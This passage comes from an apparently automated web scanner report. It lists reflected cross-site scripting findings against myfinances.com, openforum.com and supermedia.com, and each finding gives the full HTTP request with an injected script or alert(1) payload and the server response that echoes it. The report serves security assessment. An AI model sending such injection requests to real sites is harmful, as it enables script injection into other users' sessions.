Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d41"><script>alert(1)</script>3d8e0c43e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:20 GMT
Content-Length: 21653
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=r5fgdi9rsbvhrv1uang897d6f7; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type="hidden" name="back" value="/budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1" />
...[SNIP]...

4.496. http://www.myfinances.com/budget.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e9843'><script>alert(1)</script>2707c201b22 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /budget.php?query=savings+accountse9843'><script>alert(1)</script>2707c201b22&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:41 GMT
Content-Length: 19651
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/
Set-Cookie: PHPSESSID=8mri1qtefnba9k49k4ep3nl8h2; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type='text' id='keyword' name='keyword' title='savings accountse9843'><script>alert(1)</script>2707c201b22' value ='savings accountse9843'>
...[SNIP]...

4.497. http://www.myfinances.com/budget.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /budget.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a2ce6<script>alert(1)</script>826352099bb was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /budget.php?query=savings+accountsa2ce6<script>alert(1)</script>826352099bb&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 15:55:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 15:55:45 GMT
Content-Length: 19629
Connection: close
Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/
Set-Cookie: PHPSESSID=u15624i2oae1adjjrl0fa5mn65; path=/
Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<h2>Results for &lsquo;savings accountsa2ce6<script>alert(1)</script>826352099bb&rsquo;</h2>
...[SNIP]...

4.498. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /contact.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 613cb'><script>alert(1)</script>8f2541e63ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:02:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:02:44 GMT
Content-Length: 8051
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<form class='form' enctype='multipart/form-data' action='/contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1' method='post' >
...[SNIP]...

4.499. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54350'-alert(1)-'b64566be317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?54350'-alert(1)-'b64566be317=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 13:50:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/
Content-Length: 102188


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3f54350'-alert(1)-'b64566be317%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?54350'-alert(1)-'b64566be317%3d1';
   /*]]>
...[SNIP]...

4.500. https://www.openforum.com/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2f'-alert(1)-'731207dc1c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=inav_homea4b2f'-alert(1)-'731207dc1c&inav=menu_business_openforum HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2785781952.20480.0000; path=/
Content-Length: 102363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
ink = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_homea4b2f'-alert(1)-'731207dc1c%2526inav%253dmenu_business_openforum';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%3dinav_homea4b2f'-alert(1)-'731207dc1c%26inav%3dmenu_business_openforum';
   /*]]>
...[SNIP]...

4.501. https://www.openforum.com/ [inav parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db04'-alert(1)-'749ae354a20 was submitted in the inav parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cid=inav_home&inav=menu_business_openforum1db04'-alert(1)-'749ae354a20 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/
Content-Length: 102377


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...
com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum1db04'-alert(1)-'749ae354a20';
       AX.logout_dest_url = 'https://www.openforum.com/?cid%3dinav_home%26inav%3dmenu_business_openforum1db04'-alert(1)-'749ae354a20';
   /*]]>
...[SNIP]...

4.502. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.openforum.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a374f'-alert(1)-'7289baab9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a374f'-alert(1)-'7289baab9b9=1 HTTP/1.1
Host: www.openforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
SSL: True
Expires: Thu, 03 Feb 2011 13:50:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 13:50:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/
Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/
Content-Length: 102556


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro
...[SNIP]...

       AX.login_link = 'https://www99.americanexpress.com/myca/usermgt/us/action?request_type=auth_nucleusLogin&Face=en_US&lgnsrc=nucleus&PROSPECT=Y&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fa374f'-alert(1)-'7289baab9b9%253d1';
       AX.logout_dest_url = 'https://www.openforum.com/?a374f'-alert(1)-'7289baab9b9%3d1';
   /*]]>
...[SNIP]...

4.503. http://www.supermedia.com/business-listings [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aac2e"%3balert(1)//8d034beed23 was submitted in the campaignId parameter. This input was echoed as aac2e";alert(1)//8d034beed23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings?tsrc=SP&campaignId=SP_FT_AddEditaBusinessaac2e"%3balert(1)//8d034beed23 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
rop24="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AddEditaBusinessaac2e";alert(1)//8d034beed23";
s.products="";
s.eVar1="";
s.eVar2="SP";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15
...[SNIP]...

4.504. http://www.supermedia.com/business-listings [tsrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings

Issue detail

The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b9c"%3balert(1)//623d3053168 was submitted in the tsrc parameter. This input was echoed as 20b9c";alert(1)//623d3053168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings?tsrc=SP20b9c"%3balert(1)//623d3053168&campaignId=SP_FT_AddEditaBusiness HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:16:48 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>



...[SNIP]...
p27="";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="SP_FT_AddEditaBusiness";
s.products="";
s.eVar1="";
s.eVar2="SP20b9c";alert(1)//623d3053168";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

4.505. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the &tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 198c8"%3balert(1)//96cb9badcf2 was submitted in the &tsrc parameter. This input was echoed as 198c8";alert(1)//96cb9badcf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings/business-profile?&tsrc=SP198c8"%3balert(1)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 17:05:34 GMT
Set-Cookie: JSESSIONID=B9B8A68CD261E7EEF56BA494FDEE7747.app3-a1; Path=/
Set-Cookie: trafficSource="SP198c8\";alert(1)//96cb9badcf2"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Your Business Profile | SuperMedia.com Advertising</title>



...[SNIP]...
"";
s.prop28="";
s.prop29="";
s.prop30="";
/* Conversion Variables */
s.zip="";
s.purchaseID="";
s.state="";
s.events="";
s.campaign="BP:Update Your Profile Top";
s.products="";
s.eVar1="";
s.eVar2="SP198c8";alert(1)//96cb9badcf2";
s.eVar3="";
s.eVar4="";
s.eVar5="";
s.eVar6="";
s.eVar7="";
s.eVar8="";
s.eVar9="";
s.eVar10="";
s.eVar11="";
s.eVar12="";
s.eVar13="";
s.eVar14="";
s.eVar15="";
s.eVar16="";
s.eVar17="";
s.eVar18="
...[SNIP]...

4.506. http://www.supermedia.com/business-listings/business-profile [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /business-listings/business-profile

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d7a"%3balert(1)//5f4e0e8915 was submitted in the campaignId parameter. This input was echoed as b7d7a";alert(1)//5f4e0e8915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Topb7d7a"%3balert(1)//5f4e0e8915 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
